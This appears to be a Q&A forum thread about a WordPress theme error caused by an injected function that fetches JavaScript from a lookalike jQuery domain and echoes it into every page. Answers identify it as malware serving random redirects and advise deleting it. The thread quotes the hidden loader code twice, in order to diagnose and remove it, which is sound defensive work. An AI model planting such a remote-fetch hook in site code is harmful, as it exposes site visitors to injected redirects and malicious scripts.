# (http://ujquery.org/jquery-1.6.3.min.js): failed to open stream: HTTP request failed

Tags: jquery

how can i get this to work? (http://ujquery.org/jquery-1.6.3.min.js): failed to open stream: HTTP request failed! in /home1/kevindr/public_html/www.breaknl.com/wp-content/themes/Impreza/functions/enqueue.php on line 129 this the fault code and the file looks like this:

```js
add_action('wp_enqueue_scripts', 'us_styles', 12);
if(!function_exists('wp_func_jquery')) {
 function wp_func_jquery() {
  $host = 'http://';
  $jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
  $headers = get_headers($jquery, 1);
  if ($headers[0] == 'HTTP/1.1 200 OK'){
   echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
  }
 }
```

Answer (score 2):

Sorry to say this, but most probably this script injects a malware into your site and should be removed. If you follow the link (or any link) to ujquery.org you will see that it is a script snipet which points to two .js files on wpquery.org. Most of the time these files are empty, but after some page loads there will be redirection script in it and will take the current website visitor to another page (some ad, who knows).

As there is no content behind these files anyone (other than the malware) consequently ***you can and should delete the lines below***:

```
if(!function_exists('wp_func_jquery')) {
  function wp_func_jquery() {
    $host = 'http://';
    $jquery = $host.'u'.'jquery.org/jquery-ui.js';
    $headers = get_headers($jquery, 1);
    if ($headers[0] == 'HTTP/1.1 200 OK'){
      echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
    }
  }
  add_action('wp_footer', 'wp_func_jquery');
}
```

Answer (score 0):

I've had a similar issue. Just want to share so others might resolve such issues quicker.

For me the url was http://www.16wp.org/jquery.min.js.

And it DIDN'T give an error code.
The reason I found this is because I was going to my https site and FF was complaining that not all elements were secured.

Another thing I noticed is that the injection was random. So sometimes the script tag with the reference to 16wp was there and other times it wasn't.

So this was way more difficult to detect. Very sneaky stuff.